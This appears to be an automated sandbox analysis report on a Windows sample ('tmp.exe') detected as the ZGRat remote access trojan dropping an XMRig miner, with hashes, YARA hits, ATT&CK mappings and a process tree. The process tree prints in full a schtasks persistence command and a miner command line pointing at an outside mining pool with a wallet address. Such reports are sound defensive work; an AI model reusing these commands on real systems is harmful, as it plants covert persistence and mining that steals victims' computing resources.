xmrig | 8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

General

Target

tmp.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 7 IoCs

resource	yara_rule
behavioral1/memory/1712-0-0x0000000000AC0000-0x0000000001060000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000c00000001272b-15.dat	family_zgrat_v1
behavioral1/files/0x000c00000001272b-17.dat	family_zgrat_v1
behavioral1/files/0x000c00000001272b-18.dat	family_zgrat_v1
behavioral1/memory/2724-20-0x0000000000C50000-0x00000000011F0000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000c00000001272b-47.dat	family_zgrat_v1
behavioral1/memory/1540-49-0x0000000000FE0000-0x0000000001580000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/2744-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-40-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-41-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2744-44-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 7 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/memory/1712-0-0x0000000000AC0000-0x0000000001060000-memory.dmp	net_reactor
behavioral1/files/0x000c00000001272b-15.dat	net_reactor
behavioral1/files/0x000c00000001272b-17.dat	net_reactor
behavioral1/files/0x000c00000001272b-18.dat	net_reactor
behavioral1/memory/2724-20-0x0000000000C50000-0x00000000011F0000-memory.dmp	net_reactor
behavioral1/files/0x000c00000001272b-47.dat	net_reactor
behavioral1/memory/1540-49-0x0000000000FE0000-0x0000000001580000-memory.dmp	net_reactor

Executes dropped EXE 2 IoCs

pid	Process
2724	.exe
1540	.exe

Loads dropped DLL 1 IoCs

pid	Process
2376	cmd.exe

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2744-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-40-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-41-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2744-44-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2724 set thread context of 2744	2724	.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2732	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2436	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2724	.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	tmp.exe
Token: SeDebugPrivilege	2724	.exe
Token: SeLockMemoryPrivilege	2744	vbc.exe
Token: SeLockMemoryPrivilege	2744	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2744	vbc.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 1712 wrote to memory of 2376	1712	tmp.exe	28
PID 1712 wrote to memory of 2376	1712	tmp.exe	28
PID 1712 wrote to memory of 2376	1712	tmp.exe	28
PID 2376 wrote to memory of 2436	2376	cmd.exe	30
PID 2376 wrote to memory of 2436	2376	cmd.exe	30
PID 2376 wrote to memory of 2436	2376	cmd.exe	30
PID 2376 wrote to memory of 2724	2376	cmd.exe	31
PID 2376 wrote to memory of 2724	2376	cmd.exe	31
PID 2376 wrote to memory of 2724	2376	cmd.exe	31
PID 2724 wrote to memory of 2896	2724	.exe	33
PID 2724 wrote to memory of 2896	2724	.exe	33
PID 2724 wrote to memory of 2896	2724	.exe	33
PID 2896 wrote to memory of 2732	2896	cmd.exe	34
PID 2896 wrote to memory of 2732	2896	cmd.exe	34
PID 2896 wrote to memory of 2732	2896	cmd.exe	34
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2724 wrote to memory of 2744	2724	.exe	36
PID 2596 wrote to memory of 1540	2596	taskeng.exe	40
PID 2596 wrote to memory of 1540	2596	taskeng.exe	40
PID 2596 wrote to memory of 1540	2596	taskeng.exe	40

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A68.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2436
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2732
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2744

C:\Windows\system32\taskeng.exe
taskeng.exe {5D120DE0-8174-4FAF-B86B-0040BC875CC5} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2596
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  - Executes dropped EXE
  PID:1540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
516KB

MD5
9c2e032da35338d8425628604724619d

SHA1
2425eef3498cea74ec8a50bce04a03a9fff25b39

SHA256
b7822a19098b897ff8c0703947bc9526117112bbe806169254328a02fd627761

SHA512
d48e507a7fa0a71bcab3ae618fd4f9ea9292efadc5dafa046908d6c50ae6b4ee733296895bea0f392b3cbfa8d52637d241a81f8005af0b4cba0338065a9bbb0a

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
1.1MB

MD5
b6db633f3767bcf9f6ea46d8c639dbaf

SHA1
80ff3244ec26a4df2fc83457787bef729777db1a

SHA256
6ffb9fddf406dfc205a796e57abde78ecabc0632d0a978afe48e1b2451afb460

SHA512
2950f36c4470d9f526a2b0efad16bba379c765e1e28233ff42b012b2c9c92071cbe377a5b331245ee9270ebfb6badda044eb3217067d82f85543ced1510ad4eb

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
2.3MB

MD5
dcf9bca0435902cb680a565b4f2a6d5e

SHA1
46bd07845bbb51ce8c55086ceda62e17a7b39b24

SHA256
ac490ff54701f5edbdfcd98d117ea28a1ef7915a58895ec95d8d03d5cecb4735

SHA512
d53f6f8007db0d590bd9c9341647c9608b579a8ecd9eb6c64578ad6819dcadd4b97804c1384f94b3b98d8137f40dce86d61531c6bb5d3b87512b91d063cef413

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4A68.tmp.bat

Filesize
168B

MD5
bf1de5b9a349c4850b8211b32b913a3f

SHA1
a8e473e760e1c62c3d308a645702fea9bd708526

SHA256
d1fcd7083e98738c568bec99cf66f0ae9cfb02f58526d14d53eb2d8f0da0c91d

SHA512
3825e432f9e55f15a51d1b28559a878f20f866c19d26a92148f9715aa3323ad5ae00c2269280ad3cad927ab62608e74f84e92ca6ee954b58ff467f53db4f783a

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
704KB

MD5
37c13620d85077d7c2887d611263910a

SHA1
cf28eeef489a520717d257d97e4899c488a3bc77

SHA256
753b6b69ad6eaa6f452c07b2c9307297771037733398cc85fe9bfb1b518edfac

SHA512
b5fb547fc281103b895378a7b21b53cb837c75c6b8d529111f38c27e6c0d6a1a99cf449a9420d587358795c5a9d614504aea9db8208f7a8d6c925329db2f8bb1

Download Submit
memory/1540-49-0x0000000000FE0000-0x0000000001580000-memory.dmp

Filesize
5.6MB

Download
memory/1540-48-0x000007FEF5C10000-0x000007FEF65FC000-memory.dmp

Filesize
9.9MB

Download
memory/1712-0-0x0000000000AC0000-0x0000000001060000-memory.dmp

Filesize
5.6MB

Download
memory/1712-1-0x000007FEF5C10000-0x000007FEF65FC000-memory.dmp

Filesize
9.9MB

Download
memory/1712-3-0x0000000000540000-0x0000000000541000-memory.dmp

Filesize
4KB

Download
memory/1712-2-0x000000001C4A0000-0x000000001C520000-memory.dmp

Filesize
512KB

Download
memory/1712-14-0x000007FEF5C10000-0x000007FEF65FC000-memory.dmp

Filesize
9.9MB

Download
memory/2724-30-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2724-21-0x000000001C240000-0x000000001C2C0000-memory.dmp

Filesize
512KB

Download
memory/2724-19-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

Filesize
9.9MB

Download
memory/2724-20-0x0000000000C50000-0x00000000011F0000-memory.dmp

Filesize
5.6MB

Download
memory/2724-22-0x0000000000740000-0x0000000000741000-memory.dmp

Filesize
4KB

Download
memory/2744-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-34-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2744-33-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-40-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-42-0x0000000001CC0000-0x0000000001CE0000-memory.dmp

Filesize
128KB

Download
memory/2744-41-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-43-0x0000000001CE0000-0x0000000001D00000-memory.dmp

Filesize
128KB

Download
memory/2744-44-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-45-0x0000000001CC0000-0x0000000001CE0000-memory.dmp

Filesize
128KB

Download
memory/2744-46-0x0000000001CE0000-0x0000000001D00000-memory.dmp

Filesize
128KB

Download
memory/2744-26-0x000007FFFFFDE000-0x000007FFFFFDF000-memory.dmp

Filesize
4KB

Download
memory/2744-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2744-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads